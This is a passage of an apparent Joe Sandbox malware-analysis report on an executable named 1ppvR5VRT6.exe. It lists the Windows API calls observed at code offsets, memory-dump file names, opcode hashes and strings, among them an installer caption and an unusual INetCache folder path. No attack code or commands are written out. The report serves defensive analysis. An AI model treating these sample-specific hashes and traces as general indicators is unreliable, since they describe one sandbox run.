                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 9092e01b63c1174d607e096a74ab4834703e604e2c64423c66f41cce52a313c8
                              • Instruction ID: ce3aa80a16c353682a4fc60f6c60757a41c4294f2dd63ac0650dc91194aad8f9
                              • Opcode Fuzzy Hash: 9092e01b63c1174d607e096a74ab4834703e604e2c64423c66f41cce52a313c8
                              • Instruction Fuzzy Hash: E1D0127270811197CB10DBA8AB4869D77A4EB80325B318137D515F21D1E6B9C945671D
                              APIs
                              • SendMessageA.USER32(0001048A,00000000,00000000,00000000), ref: 004041B8
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                              • Instruction ID: 55b95b209562bae9886b89f2f6925b48322e85585088ac1ac71ede26d93296ac
                              • Opcode Fuzzy Hash: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                              • Instruction Fuzzy Hash: 77C09B717407017BEA208F509E4DF0777A96750701F2944397760F60D0C6F4D450DA1C
                              APIs
                              • ShellExecuteExA.SHELL32(?,0040457F,?), ref: 0040578A
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ExecuteShell
                              • String ID:
                              • API String ID: 587946157-0
                              • Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                              • Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
                              • Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                              • Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                              APIs
                              • SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                              • Instruction ID: 10cfd25431557a88665167ebbf17620150c727a9bd7140e907e4ecff4ccdfc3e
                              • Opcode Fuzzy Hash: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                              • Instruction Fuzzy Hash: 30B09236280A00AAEE218B00DE09F457AA2E7A8742F028028B250240B0CAB200A1DB08
                              APIs
                              • KiUserCallbackDispatcher.NTDLL(?,00403F58), ref: 00404186
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CallbackDispatcherUser
                              • String ID:
                              • API String ID: 2492992576-0
                              • Opcode ID: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                              • Instruction ID: bd711969ba89efe8629f231cafa01baa053f2358784498ab8b3cf30639ef5a41
                              • Opcode Fuzzy Hash: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                              • Instruction Fuzzy Hash: 55A012320000009FCB014B50EF04C057F71AB543007018435E140400338A310821FF0C
                              APIs
                              • Sleep.KERNELBASE(00000000), ref: 004014E9
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: c0e700f1fcdc4ffa98e8290517b670d0cf04be8f77536005ba3f54c52213854c
                              • Instruction ID: 570e0916f0090f26c7ee0a6088be2661e77b817c4cb0ee023996dcc8b23dd1f7
                              • Opcode Fuzzy Hash: c0e700f1fcdc4ffa98e8290517b670d0cf04be8f77536005ba3f54c52213854c
                              • Instruction Fuzzy Hash: 96D05E73B141518BD754EBB9BA8845E73E4EB903153214837E852E2091EA78C8424A28
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404B55
                              • GetDlgItem.USER32(?,00000408), ref: 00404B60
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
                              • LoadBitmapA.USER32(0000006E), ref: 00404BBD
                              • SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
                              • DeleteObject.GDI32(00000000), ref: 00404C33
                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
                              • GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
                              • ShowWindow.USER32(?,00000005), ref: 00404D8C
                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
                              • ImageList_Destroy.COMCTL32(00000000), ref: 00404F5C
                              • GlobalFree.KERNEL32(00000000), ref: 00404F6C
                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
                              • SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
                              • ShowWindow.USER32(?,00000000), ref: 0040510B
                              • GetDlgItem.USER32(?,000003FE), ref: 00405116
                              • ShowWindow.USER32(00000000), ref: 0040511D
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 1638840714-813528018
                              • Opcode ID: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                              • Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
                              • Opcode Fuzzy Hash: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                              • Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 00404619
                              • SetWindowTextA.USER32(00000000,?), ref: 00404643
                              • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
                              • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                              • lstrcmpiA.KERNEL32(Call,symphonized: Installing), ref: 00404731
                              • lstrcatA.KERNEL32(?,Call), ref: 0040473D
                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F
                                • Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC
                                • Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\1ppvR5VRT6.exe",75A33410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                • Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                • Part of subcall function 00406303: CharNextA.USER32(?,"C:\Users\user\Desktop\1ppvR5VRT6.exe",75A33410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                • Part of subcall function 00406303: CharPrevA.USER32(?,?,75A33410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                              • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828
                                • Part of subcall function 00404981: lstrlenA.KERNEL32(symphonized: Installing,symphonized: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                • Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
                                • Part of subcall function 00404981: SetDlgItemTextA.USER32(?,symphonized: Installing), ref: 00404A3A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing$Call$symphonized: Installing
                              • API String ID: 2624150263-1620255596
                              • Opcode ID: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                              • Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
                              • Opcode Fuzzy Hash: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                              • Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69
                              APIs
                                • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                              • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                              • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                              • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                              • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                              • GlobalFree.KERNEL32(?), ref: 10001CC4
                              • GlobalFree.KERNEL32(?), ref: 10001CC9
                              • GlobalFree.KERNEL32(?), ref: 10001CCE
                              • GlobalFree.KERNEL32(00000000), ref: 10001E76
                              • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Global$Free$lstrcpy$Alloc
                              • String ID:
                              • API String ID: 4227406936-0
                              • Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                              • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                              • Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                              • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: c36892e06c5a05a47b1c83c5296ec74ed019d09ea245c2b35f81d61d6accc4a2
                              • Instruction ID: 0159b05a81fb7445ac67952f267e1ed3d95360429fb03f1bd53dceef05a54f2a
                              • Opcode Fuzzy Hash: c36892e06c5a05a47b1c83c5296ec74ed019d09ea245c2b35f81d61d6accc4a2
                              • Instruction Fuzzy Hash: EEF055727041019BC300EBB49948AEEB768DF21324F20017FE285F20C1C7B889469B3A
                              APIs
                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404342
                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
                              • GetSysColor.USER32(?), ref: 00404371
                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                              • lstrlenA.KERNEL32(?), ref: 00404392
                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
                              • GetDlgItem.USER32(?,0000040A), ref: 00404418
                              • SendMessageA.USER32(00000000), ref: 0040441B
                              • GetDlgItem.USER32(?,000003E8), ref: 00404446
                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
                              • LoadCursorA.USER32(00000000,00007F02), ref: 00404495
                              • SetCursor.USER32(00000000), ref: 0040449E
                              • LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
                              • SetCursor.USER32(00000000), ref: 004044B7
                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
